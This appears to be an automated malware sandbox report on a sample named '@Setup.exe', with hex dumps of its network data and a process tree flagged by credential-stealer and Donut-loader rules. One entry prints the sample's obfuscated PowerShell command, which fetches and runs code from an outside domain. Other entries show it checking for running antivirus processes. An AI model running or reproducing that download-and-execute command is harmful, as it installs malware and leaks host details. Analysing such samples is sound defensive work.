                                                                                                                                                                                            2024-12-27 19:23:43 UTC1369INData Raw: 01 00 01 01 02 00 02 00 5b 00 e8 80 40 00 11 53 61 66 65 43 61 6c 6c 45 78 63 65 70 74 69 6f 6e 03 00 28 13 40 00 08 00 03 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 08 9c 1f 40 00 01 00 0c 45 78 63 65 70 74 4f 62 6a 65 63 74 02 00 00 00 11 40 00 02 00 0a 45 78 63 65 70 74 41 64 64 72 02 00 02 00 31 00 08 81 40 00 11 41 66 74 65 72 43 6f 6e 73 74 72 75 63 74 69 6f 6e 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 31 00 0c 81 40 00 11 42 65 66 6f 72 65 44 65 73 74 72 75 63 74 69 6f 6e 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 39 00 10 81 40 00 08 44 69 73 70 61 74 63 68 03 00 00 00 00 00 08 00 02 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 01 00 00 00 00 01 00 07 4d 65 73 73 61 67 65 02 00 02 00 3f
                                                                                                                                                                                            Data Ascii: [@SafeCallException(@@Self@ExceptObject@ExceptAddr1@AfterConstruction@Self1@BeforeDestruction@Self9@Dispatch@SelfMessage?
                                                                                                                                                                                            2024-12-27 19:23:43 UTC1369INData Raw: 02 9c 10 40 00 02 00 05 41 46 6c 61 67 02 00 02 b8 12 40 00 08 00 05 41 44 61 74 61 02 00 02 00 00 5c 23 40 00 07 0f 48 50 50 47 45 4e 41 74 74 72 69 62 75 74 65 b8 22 40 00 34 20 40 00 00 00 06 53 79 73 74 65 6d 00 00 00 00 02 00 00 00 00 00 8c 23 40 00 14 08 50 4d 6f 6e 69 74 6f 72 8c 24 40 00 02 00 a0 23 40 00 14 17 54 4d 6f 6e 69 74 6f 72 2e 50 57 61 69 74 69 6e 67 54 68 72 65 61 64 c0 23 40 00 02 00 00 c4 23 40 00 0e 17 54 4d 6f 6e 69 74 6f 72 2e 54 57 61 69 74 69 6e 67 54 68 72 65 61 64 0c 00 00 00 00 00 00 00 00 03 00 00 00 9c 23 40 00 00 00 00 00 02 04 4e 65 78 74 02 00 e4 10 40 00 04 00 00 00 02 06 54 68 72 65 61 64 02 00 00 11 40 00 08 00 00 00 02 09 57 61 69 74 45 76 65 6e 74 02 00 02 00 00 00 00 00 00 2c 24 40 00 0e 12 54 4d 6f 6e 69 74 6f 72
                                                                                                                                                                                            Data Ascii: @AFlag@AData\#@HPPGENAttribute"@4 @System#@PMonitor$@#@TMonitor.PWaitingThread#@#@TMonitor.TWaitingThread#@Next@Thread@WaitEvent,$@TMonitor
                                                                                                                                                                                            2024-12-27 19:23:43 UTC1369INData Raw: 6f 6e 73 74 72 75 63 74 69 6f 6e 03 00 00 00 00 00 08 00 01 08 10 29 40 00 00 00 04 53 65 6c 66 02 00 02 00 31 00 ec f1 40 00 11 42 65 66 6f 72 65 44 65 73 74 72 75 63 74 69 6f 6e 03 00 00 00 00 00 08 00 01 08 10 29 40 00 00 00 04 53 65 6c 66 02 00 02 00 2b 00 00 f2 40 00 0b 4e 65 77 49 6e 73 74 61 6e 63 65 03 00 9c 1f 40 00 08 00 01 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 00 14 29 40 00 07 11 54 49 6e 74 65 72 66 61 63 65 64 4f 62 6a 65 63 74 2c 28 40 00 9c 1f 40 00 00 00 06 53 79 73 74 65 6d 00 00 01 00 02 47 29 40 00 02 00 02 00 00 00 9c 10 40 00 d4 f1 40 00 00 00 00 00 01 00 00 00 00 00 00 80 00 00 00 80 ff ff 08 52 65 66 43 6f 75 6e 74 00 00 cc 83 44 24 04 fc e9 21 c9 00 00 83 44 24 04 fc e9 3f c9 00 00 83 44 24 04 fc e9 41 c9 00 00 cc 6d 29 40
                                                                                                                                                                                            Data Ascii: onstruction)@Self1@BeforeDestruction)@Self+@NewInstance@Self)@TInterfacedObject,(@@SystemG)@@@RefCountD$!D$?D$Am)@
                                                                                                                                                                                            2024-12-27 19:23:43 UTC1369INData Raw: 00 02 08 56 42 6f 6f 6c 65 61 6e 02 00 00 11 40 00 08 00 00 00 02 08 56 55 6e 6b 6e 6f 77 6e 02 00 64 10 40 00 08 00 00 00 02 09 56 53 68 6f 72 74 49 6e 74 02 00 b4 10 40 00 08 00 00 00 02 05 56 42 79 74 65 02 00 cc 10 40 00 08 00 00 00 02 05 56 57 6f 72 64 02 00 e4 10 40 00 08 00 00 00 02 09 56 4c 6f 6e 67 57 6f 72 64 02 00 e4 10 40 00 08 00 00 00 02 07 56 55 49 6e 74 33 32 02 00 14 11 40 00 08 00 00 00 02 06 56 49 6e 74 36 34 02 00 34 11 40 00 08 00 00 00 02 07 56 55 49 6e 74 36 34 02 00 00 11 40 00 08 00 00 00 02 07 56 53 74 72 69 6e 67 02 00 00 11 40 00 08 00 00 00 02 04 56 41 6e 79 02 00 d4 2b 40 00 08 00 00 00 02 06 56 41 72 72 61 79 02 00 00 11 40 00 08 00 00 00 02 08 56 50 6f 69 6e 74 65 72 02 00 00 11 40 00 08 00 00 00 02 08 56 55 53 74 72 69 6e
                                                                                                                                                                                            Data Ascii: VBoolean@VUnknownd@VShortInt@VByte@VWord@VLongWord@VUInt32@VInt644@VUInt64@VString@VAny+@VArray@VPointer@VUStrin
                                                                                                                                                                                            2024-12-27 19:23:43 UTC1369INData Raw: 00 00 24 17 40 00 f8 7e 40 00 00 7f 40 00 f0 80 40 00 e8 80 40 00 08 81 40 00 0c 81 40 00 10 81 40 00 04 81 40 00 8c 7d 40 00 a4 7d 40 00 d8 7d 40 00 00 00 43 00 9b 35 40 00 44 00 f4 ff c1 35 40 00 41 00 f4 ff e6 35 40 00 41 00 f4 ff 0c 36 40 00 41 00 f4 ff 34 36 40 00 41 00 f4 ff 62 36 40 00 41 00 f4 ff 90 36 40 00 43 00 f4 ff c6 36 40 00 43 00 f4 ff 11 37 40 00 43 00 f4 ff 45 37 40 00 43 00 f4 ff a7 37 40 00 43 00 f4 ff 09 38 40 00 43 00 f4 ff 6b 38 40 00 43 00 f4 ff cd 38 40 00 43 00 f4 ff 2f 39 40 00 43 00 f4 ff 91 39 40 00 43 00 f4 ff f3 39 40 00 43 00 f4 ff 55 3a 40 00 43 00 f4 ff b7 3a 40 00 43 00 f4 ff 19 3b 40 00 43 00 f4 ff 7b 3b 40 00 43 00 f4 ff dd 3b 40 00 43 00 f4 ff 3f 3c 40 00 43 00 f4 ff a1 3c 40 00 43 00 f4 ff 03 3d 40 00 43 00 f4 ff 65
                                                                                                                                                                                            Data Ascii: $@~@@@@@@@@}@}@}@C5@D5@A5@A6@A46@Ab6@A6@C6@C7@CE7@C7@C8@Ck8@C8@C/9@C9@C9@CU:@C:@C;@C{;@C;@C?<@C<@C=@Ce
                                                                                                                                                                                            2024-12-27 19:23:43 UTC1369INData Raw: 04 4c 40 00 02 00 04 44 65 73 74 02 00 00 9c 10 40 00 0c 00 0a 53 74 61 72 74 49 6e 64 65 78 02 00 00 9c 10 40 00 08 00 05 43 6f 75 6e 74 02 00 02 00 62 00 28 9c 4a 00 04 43 6f 70 79 03 00 00 00 00 00 10 00 05 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 3c 4c 40 00 01 00 03 53 72 63 02 00 00 9c 10 40 00 02 00 0a 53 74 61 72 74 49 6e 64 65 78 02 00 00 08 32 40 00 0c 00 04 44 65 73 74 02 00 00 9c 10 40 00 08 00 05 43 6f 75 6e 74 02 00 02 00 62 00 28 9c 4a 00 04 43 6f 70 79 03 00 00 00 00 00 10 00 05 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 08 32 40 00 01 00 03 53 72 63 02 00 01 3c 4c 40 00 02 00 04 44 65 73 74 02 00 00 9c 10 40 00 0c 00 0a 53 74 61 72 74 49 6e 64 65 78 02 00 00 9c 10 40 00 08 00 05 43 6f 75 6e 74 02 00 02 00 62 00 28 9c 4a 00 04 43 6f
                                                                                                                                                                                            Data Ascii: L@Dest@StartIndex@Countb(JCopySelf<L@Src@StartIndex2@Dest@Countb(JCopySelf2@Src<L@Dest@StartIndex@Countb(JCo


                                                                                                                                                                                            Statistics

                                                                                                                                                                                            CPU Usage

                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                            Memory Usage

                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                            High Level Behavior Distribution

                                                                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                                                                            Behavior

                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                            System Behavior

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:0
                                                                                                                                                                                            Start time:14:23:02
                                                                                                                                                                                            Start date:27/12/2024
                                                                                                                                                                                            Path:C:\Users\user\Desktop\@Setup.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:"C:\Users\user\Desktop\@Setup.exe"
                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                            File size:74'057'612 bytes
                                                                                                                                                                                            MD5 hash:FC4450B75AE409FE64D363E515B0AA5E
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                            • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.2276066232.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1843735948.0000000000A3E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:4
                                                                                                                                                                                            Start time:14:23:41
                                                                                                                                                                                            Start date:27/12/2024
                                                                                                                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; ?
                                                                                                                                                                                            Imagebase:0xbd0000
                                                                                                                                                                                            File size:433'152 bytes
                                                                                                                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:5
                                                                                                                                                                                            Start time:14:23:41
                                                                                                                                                                                            Start date:27/12/2024
                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:6
                                                                                                                                                                                            Start time:14:24:03
                                                                                                                                                                                            Start date:27/12/2024
                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\NBKXWJSCH7YAAAADC9LJIYY.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\NBKXWJSCH7YAAAADC9LJIYY.exe"
                                                                                                                                                                                            Imagebase:0xea0000
                                                                                                                                                                                            File size:12'191'445 bytes
                                                                                                                                                                                            MD5 hash:34B63F16F994365A2FC9263E87CD28E8
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:Borland Delphi
                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                            • Detection: 16%, ReversingLabs
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:7
                                                                                                                                                                                            Start time:14:24:05
                                                                                                                                                                                            Start date:27/12/2024
                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\is-3D3BV.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmp
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\is-3D3BV.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmp" /SL5="$A0076,11205210,845824,C:\Users\user\AppData\Local\Temp\NBKXWJSCH7YAAAADC9LJIYY.exe"
                                                                                                                                                                                            Imagebase:0xf60000
                                                                                                                                                                                            File size:3'367'424 bytes
                                                                                                                                                                                            MD5 hash:A62041070E18901131CBBE7825EC4EC7
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:Borland Delphi
                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                            • Detection: 0%, ReversingLabs
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:8
                                                                                                                                                                                            Start time:14:24:07
                                                                                                                                                                                            Start date:27/12/2024
                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\NBKXWJSCH7YAAAADC9LJIYY.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\NBKXWJSCH7YAAAADC9LJIYY.exe" /VERYSILENT
                                                                                                                                                                                            Imagebase:0xea0000
                                                                                                                                                                                            File size:12'191'445 bytes
                                                                                                                                                                                            MD5 hash:34B63F16F994365A2FC9263E87CD28E8
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:Borland Delphi
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:9
                                                                                                                                                                                            Start time:14:24:09
                                                                                                                                                                                            Start date:27/12/2024
                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\is-9Q81V.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmp
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\is-9Q81V.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmp" /SL5="$C0070,11205210,845824,C:\Users\user\AppData\Local\Temp\NBKXWJSCH7YAAAADC9LJIYY.exe" /VERYSILENT
                                                                                                                                                                                            Imagebase:0xf00000
                                                                                                                                                                                            File size:3'367'424 bytes
                                                                                                                                                                                            MD5 hash:A62041070E18901131CBBE7825EC4EC7
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:Borland Delphi
                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                            • Detection: 0%, ReversingLabs
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:11
                                                                                                                                                                                            Start time:14:24:43
                                                                                                                                                                                            Start date:27/12/2024
                                                                                                                                                                                            Path:C:\Windows\System32\timeout.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"timeout" 9
                                                                                                                                                                                            Imagebase:0x7ff7e6270000
                                                                                                                                                                                            File size:32'768 bytes
                                                                                                                                                                                            MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:moderate
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:12
                                                                                                                                                                                            Start time:14:24:43
                                                                                                                                                                                            Start date:27/12/2024
                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:13
                                                                                                                                                                                            Start time:14:24:52
                                                                                                                                                                                            Start date:27/12/2024
                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe"
                                                                                                                                                                                            Imagebase:0x7ff7692f0000
                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:14
                                                                                                                                                                                            Start time:14:24:52
                                                                                                                                                                                            Start date:27/12/2024
                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:15
                                                                                                                                                                                            Start time:14:24:52
                                                                                                                                                                                            Start date:27/12/2024
                                                                                                                                                                                            Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
                                                                                                                                                                                            Imagebase:0x7ff762110000
                                                                                                                                                                                            File size:106'496 bytes
                                                                                                                                                                                            MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:16
                                                                                                                                                                                            Start time:14:24:52
                                                                                                                                                                                            Start date:27/12/2024
                                                                                                                                                                                            Path:C:\Windows\System32\find.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:find /I "wrsa.exe"
                                                                                                                                                                                            Imagebase:0x7ff7f6e90000
                                                                                                                                                                                            File size:17'920 bytes
                                                                                                                                                                                            MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:17
                                                                                                                                                                                            Start time:14:24:52
                                                                                                                                                                                            Start date:27/12/2024
                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe"
                                                                                                                                                                                            Imagebase:0x7ff7692f0000
                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:18
                                                                                                                                                                                            Start time:14:24:52
                                                                                                                                                                                            Start date:27/12/2024
                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:19
                                                                                                                                                                                            Start time:14:24:52
                                                                                                                                                                                            Start date:27/12/2024
                                                                                                                                                                                            Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
                                                                                                                                                                                            Imagebase:0x7ff762110000
                                                                                                                                                                                            File size:106'496 bytes
                                                                                                                                                                                            MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:20
                                                                                                                                                                                            Start time:14:24:52
                                                                                                                                                                                            Start date:27/12/2024
                                                                                                                                                                                            Path:C:\Windows\System32\find.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:find /I "opssvc.exe"
                                                                                                                                                                                            Imagebase:0x7ff7f6e90000
                                                                                                                                                                                            File size:17'920 bytes
                                                                                                                                                                                            MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:21
                                                                                                                                                                                            Start time:14:24:52
                                                                                                                                                                                            Start date:27/12/2024
                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe"
                                                                                                                                                                                            Imagebase:0x7ff7692f0000
                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:22
                                                                                                                                                                                            Start time:14:24:52
                                                                                                                                                                                            Start date:27/12/2024
                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:23
                                                                                                                                                                                            Start time:14:24:53
                                                                                                                                                                                            Start date:27/12/2024
                                                                                                                                                                                            Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
                                                                                                                                                                                            Imagebase:0x7ff762110000
                                                                                                                                                                                            File size:106'496 bytes
                                                                                                                                                                                            MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:24
                                                                                                                                                                                            Start time:14:24:53
                                                                                                                                                                                            Start date:27/12/2024
                                                                                                                                                                                            Path:C:\Windows\System32\find.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:find /I "avastui.exe"
                                                                                                                                                                                            Imagebase:0x7ff7f6e90000
                                                                                                                                                                                            File size:17'920 bytes
                                                                                                                                                                                            MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:25
                                                                                                                                                                                            Start time:14:24:53
                                                                                                                                                                                            Start date:27/12/2024
                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe"
                                                                                                                                                                                            Imagebase:0x7ff7692f0000
                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:26
                                                                                                                                                                                            Start time:14:24:53
                                                                                                                                                                                            Start date:27/12/2024
                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                            Imagebase:0x7ff6ec4b0000
                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:27
                                                                                                                                                                                            Start time:14:24:53
                                                                                                                                                                                            Start date:27/12/2024
                                                                                                                                                                                            Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
                                                                                                                                                                                            Imagebase:0x7ff762110000
                                                                                                                                                                                            File size:106'496 bytes
                                                                                                                                                                                            MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:28
                                                                                                                                                                                            Start time:14:24:53
                                                                                                                                                                                            Start date:27/12/2024
                                                                                                                                                                                            Path:C:\Windows\System32\find.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:find /I "avgui.exe"
                                                                                                                                                                                            Imagebase:0x7ff7f6e90000
                                                                                                                                                                                            File size:17'920 bytes
                                                                                                                                                                                            MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:29
                                                                                                                                                                                            Start time:14:24:53
                                                                                                                                                                                            Start date:27/12/2024
                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe"
                                                                                                                                                                                            Imagebase:0x7ff7692f0000
                                                                                                                                                                                            File size:289'792 bytes
